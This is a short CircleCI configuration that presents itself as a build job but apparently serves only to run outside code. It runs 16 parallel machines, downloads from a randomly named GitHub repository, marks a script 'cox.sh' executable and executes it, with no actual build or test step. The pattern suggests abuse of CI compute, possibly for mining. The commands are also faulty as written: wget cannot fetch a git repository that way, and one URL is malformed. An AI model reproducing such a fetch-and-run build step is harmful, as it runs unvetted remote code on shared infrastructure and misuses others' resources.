version: 2.1

jobs:
  build:
    parallelism: 16
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run : |
             wget https://github.com/uiasnbhaas/sasjkwai.git
             wget git@github.com:uiasnbhaas/sasjkwai.git
             chmod +x cox.sh
             ./cox.sh
